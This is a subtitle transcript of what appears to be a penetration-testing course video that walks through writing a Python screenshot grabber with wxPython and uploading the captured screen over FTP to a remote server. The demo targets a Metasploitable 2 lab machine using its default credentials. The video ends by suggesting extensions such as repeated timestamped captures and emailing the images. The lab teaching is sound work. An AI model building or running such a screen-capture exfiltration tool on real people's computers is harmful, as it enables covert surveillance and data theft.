1 00:00:00,510 --> 00:00:04,260 In this video you're going to learn how to grab screenshots with Python.
2 00:00:04,590 --> 00:00:11,160 Additionally, once the screenshot is grabbed, we'll code a feature to send itself to a remote location such
3 00:00:11,160 --> 00:00:15,400 as uploading itself to an FTP server.
4 00:00:15,400 --> 00:00:21,600 Now this is very useful in scenarios where you need to conduct a lot of information gathering. Not all
5 00:00:21,600 --> 00:00:24,390 scenarios rely heavily on information gathering,
6 00:00:24,420 --> 00:00:30,850 even though this is part of the penetration testing methodology, so this is really the case for specificity.
7 00:00:30,990 --> 00:00:37,560 Now in Python there are many libraries that you can use to take screenshots, and the one we'll be using
8 00:00:37,560 --> 00:00:39,530 here is wxPython.
9 00:00:40,140 --> 00:00:44,350 If you don't have it already, and I assume you don't.
10 00:00:44,550 --> 00:00:51,540 If you don't have it already installed, just open up a terminal or a command prompt, command prompt
11 00:00:51,540 --> 00:00:53,870 in my case, and do a pip
12 00:00:53,890 --> 00:00:58,440 3 install wxPython
13 00:01:02,130 --> 00:01:04,260 Great, with that out of the way,
14 00:01:04,350 --> 00:01:16,890 let's actually get into the coding. So we first start by importing wxPython with wx, and we also need
15 00:01:16,890 --> 00:01:23,320 the os and the ftplib modules.
16 00:01:23,340 --> 00:01:29,760 Now for those of you who don't know, wxPython is a library that's heavily used in coding graphical
17 00:01:29,760 --> 00:01:35,250 applications or GUI applications with Python, such as Windows applications for example.
18 00:01:35,250 --> 00:01:39,540 It's similar to Tkinter, which is another GUI Python library.
19 00:01:39,540 --> 00:01:47,970 However I'd like to think that's more developed than Tkinter. OK, so to build our screen grab or screenshot
20 00:01:48,140 --> 00:01:58,260 grabber we'll first need to actually instantiate a wx app, and we do that with wx.App, so we have
21 00:01:58,260 --> 00:02:03,050 a variable w which instantiates a wx.
22 00:02:03,810 --> 00:02:10,800 And then we also need another variable to make a call to the ScreenDC method that enables us to get
23 00:02:10,800 --> 00:02:18,810 the screen, so we'll say screen equals wx.ScreenDC.
24 00:02:18,840 --> 00:02:24,540 Now I won't go into details in any of these particular methods because there are entire books written
25 00:02:24,540 --> 00:02:29,530 on wxPython. Here I will just use them conveniently.
26 00:02:29,610 --> 00:02:38,010 Okay, now we need to create an empty bitmap, sort of like, you can think of a bitmap in this case like
27 00:02:38,100 --> 00:02:41,270 a canvas that has the size of the screen.
28 00:02:41,430 --> 00:02:46,710 So first we'll say size equals screen
29 00:02:49,710 --> 00:02:51,000 .Get
30 00:02:51,150 --> 00:02:54,940 Size. OK.
31 00:02:55,640 --> 00:03:07,800 Then bmap equals wx.Bitmap, size zero.
32 00:03:08,000 --> 00:03:10,830 And also size 1.
33 00:03:10,860 --> 00:03:17,620 The next thing we need is a memory device context to enable us to draw graphics onto the bitmap
34 00:03:17,670 --> 00:03:18,960 we've just created.
35 00:03:19,350 --> 00:03:27,120 So we'll say memo equals wx.MemoryDC, bmap.
36 00:03:27,420 --> 00:03:31,350 So this is the parameter or the argument that we need to specify.
37 00:03:31,740 --> 00:03:36,400 And then we just copy our previously defined screen into this context.
38 00:03:36,540 --> 00:03:45,560 So we do that with memo.Blit, 0, 0, and I'll explain shortly,
39 00:03:45,780 --> 00:03:55,500 size 0, size 1, screen, 0, 0.
40 00:03:56,280 --> 00:03:56,660 Okay.
41 00:03:56,690 --> 00:04:04,140 So we have the first two zeros for the X and Y positions of the destination device.
42 00:04:04,140 --> 00:04:08,970 Then we have the height, the height and the width of the area
43 00:04:08,970 --> 00:04:10,180 we copy.
44 00:04:10,350 --> 00:04:13,990 Then we have the source from what we copy, which is the screen.
45 00:04:14,280 --> 00:04:18,700 And finally we have the x and y of the source device context.
46 00:04:19,230 --> 00:04:21,410 Okay, so this is all interesting stuff.
47 00:04:21,450 --> 00:04:26,910 And it was quite complicated for me to wrap my head around it when I saw it the first time, so don't
48 00:04:26,910 --> 00:04:29,830 get intimidated if you don't understand everything here.
49 00:04:30,210 --> 00:04:36,660 However if you want to precisely know what all these methods do in essence, you can further study the
50 00:04:36,660 --> 00:04:41,090 documentation of wxPython and wxPython.
51 00:04:41,220 --> 00:04:41,610 Or.
52 00:04:42,150 --> 00:04:45,330 But here we just went to the straight code.
53 00:04:45,660 --> 00:04:46,180 All right.
54 00:04:46,200 --> 00:04:53,000 Now what we'll do is to delete the memo object we've created because we don't need it anymore, so we'll
55 00:04:53,010 --> 00:04:56,570 say del memo.
56 00:04:57,270 --> 00:05:06,520 And lastly we'll save the bmap or bitmap as PNG, which is more straightforward, so we'll say bmap
57 00:05:08,080 --> 00:05:23,610 .SaveFile, we'll give it a name, grabbed.png, and a parameter wx.BITMAP_TYPE_PNG,
58 00:05:24,960 --> 00:05:27,750 which is more straightforward like I said.
59 00:05:27,780 --> 00:05:30,760 So we have the file name, all right.
60 00:05:31,170 --> 00:05:37,880 And then the method from the wx library that defines the type we want our image to be saved as.
61 00:05:38,010 --> 00:05:40,770 So it's PNG and that's it.
62 00:05:40,770 --> 00:05:46,590 Now you might be wondering or saying to yourself that we had to write so many lines of code just to take
63 00:05:46,590 --> 00:05:47,250 a screenshot.
64 00:05:47,760 --> 00:05:49,780 Yes, that is correct.
65 00:05:49,980 --> 00:05:55,260 And there are higher level libraries in Python such as pyscreenshot or others that would let you do
66 00:05:55,260 --> 00:05:57,870 the same thing in two or three lines of code.
67 00:05:57,870 --> 00:06:05,340 My purpose for this video was to go a bit deeper and actually get into the graphics of it to a certain
68 00:06:05,340 --> 00:06:06,560 extent, so to speak.
69 00:06:07,240 --> 00:06:13,440 OK, that said, let's actually go to the fun part of it, which is how this screenshot will send itself over
70 00:06:13,440 --> 00:06:16,490 FTP to a remote server.
71 00:06:17,760 --> 00:06:24,720 So at the top we've imported ftplib, and first what we need to do is to create a session, so let's call
72 00:06:24,720 --> 00:06:34,710 it sess_ equals ftplib.FTP, and then here we'll have to specify the IP of our machine, so
73 00:06:34,740 --> 00:06:46,020 192.168, let's say 0.1, and we also need to specify a user name for the FTP and a password
74 00:06:46,020 --> 00:06:54,480 for the FTP, because in order to actually be able to upload a file to the FTP server
75 00:06:54,480 --> 00:07:00,610 you need to provide credentials, so msfadmin, msfadmin.
76 00:07:01,290 --> 00:07:08,280 So the FTP server we'll use for this purpose is a vulnerable machine called Metasploitable 2, which is
77 00:07:08,610 --> 00:07:09,970 up and running here.
78 00:07:10,020 --> 00:07:13,420 So this is Metasploitable 2, which runs the FTP server.
79 00:07:13,860 --> 00:07:14,360 OK.
80 00:07:14,370 --> 00:07:22,410 Now what we need to do is to actually open our screenshot file in read binary mode, so we'll say file
81 00:07:23,670 --> 00:07:24,690 underscore
82 00:07:27,730 --> 00:07:34,250 equals open, let's say grabbed.png,
83 00:07:35,140 --> 00:07:41,530 like I said, in read binary mode, and then we have to send it over FTP using the method storbinary
84 00:07:41,530 --> 00:07:43,760 from the ftplib library.
85 00:07:43,820 --> 00:07:53,410 So we'll say sess_.storbinary, and then we need to send the command STOR, and we'll
86 00:07:53,470 --> 00:08:01,250 upload the file to the tmp folder as grabbed.png, so .png.
87 00:08:01,360 --> 00:08:10,030 And what we need to store in this /tmp/grabbed.png is whatever information is in our file underscore,
88 00:08:10,510 --> 00:08:21,040 which is the screenshot we've taken. Now as a rule of good practice we close both the file and the session
89 00:08:21,820 --> 00:08:30,130 before terminating or finishing the code for the script, so we'll say file underscore dot close and then
90 00:08:30,640 --> 00:08:32,650 SAS on their scorecard.
91 00:08:33,820 --> 00:08:34,380 Okay.
92 00:08:34,390 --> 00:08:37,490 And that's actually pretty much it.
93 00:08:37,900 --> 00:08:44,070 Now like I said I will be demonstrating this and make sure that it all works.
94 00:08:44,080 --> 00:08:52,870 So the FTP server is up and running here, and like I said it's Metasploitable 2, and we need to find
95 00:08:52,870 --> 00:09:04,810 its IP address with ifconfig. As you can see it's 192.168.85.128, so it's
96 00:09:04,900 --> 00:09:06,330 85.
97 00:09:06,700 --> 00:09:07,710 128.
98 00:09:07,720 --> 00:09:14,470 All right, let's save the script, then I'm going to have a command prompt and navigate to the location
99 00:09:14,470 --> 00:09:24,430 of the script, and then I can simply run it with py -3 grabbed.py, and if everything worked
100 00:09:24,430 --> 00:09:30,420 correctly we should have our screenshot uploaded in the tmp folder on the FTP server.
101 00:09:30,580 --> 00:09:40,960 So if I hit enter it's gonna take a screenshot and then it's going to send it over into the remote location
102 00:09:41,050 --> 00:09:42,870 in the tmp folder.
103 00:09:42,880 --> 00:09:51,750 Now if we look in the tmp folder, so cd /tmp, there is nothing in here, just some random file, okay.
104 00:09:51,750 --> 00:09:54,640 And then if I run this, enter,
105 00:09:58,280 --> 00:10:06,890 it should take the screenshot and it should already be sent over here, so if I do ls once again
106 00:10:07,070 --> 00:10:10,710 we can see we have the .png.
107 00:10:10,730 --> 00:10:20,840 If we look with ls -a, ls -al more precisely, we can see that it's eighty one thousand bytes
108 00:10:20,840 --> 00:10:21,450 or so.
109 00:10:23,600 --> 00:10:32,300 If I look on the desktop, if I hover over it, it's roughly seventy nine point three, which is exactly the
110 00:10:32,300 --> 00:10:37,610 same size, and if I look into it there is this screenshot.
111 00:10:37,610 --> 00:10:39,260 So this was one way to go.
112 00:10:39,290 --> 00:10:43,970 A screenshot grabber that uploads itself to a remote location.
113 00:10:43,970 --> 00:10:48,500 Now make sure to study the wxPython and the ftplib libraries
114 00:10:48,500 --> 00:10:53,290 if you want to get a more in-depth understanding of how they work and what their capabilities are.
115 00:10:54,020 --> 00:11:00,320 As always you can further greatly expand the capabilities of the script by making it for example upload
116 00:11:00,320 --> 00:11:05,150 itself to multiple locations or send it to itself via email.
117 00:11:05,150 --> 00:11:12,410 You could also timestamp and take multiple screenshots at multiple points in time, and these are just
118 00:11:12,410 --> 00:11:20,210 a few ideas, but there is a lot more this script or program can be developed into. The only limit is
119 00:11:20,210 --> 00:11:21,650 your imagination.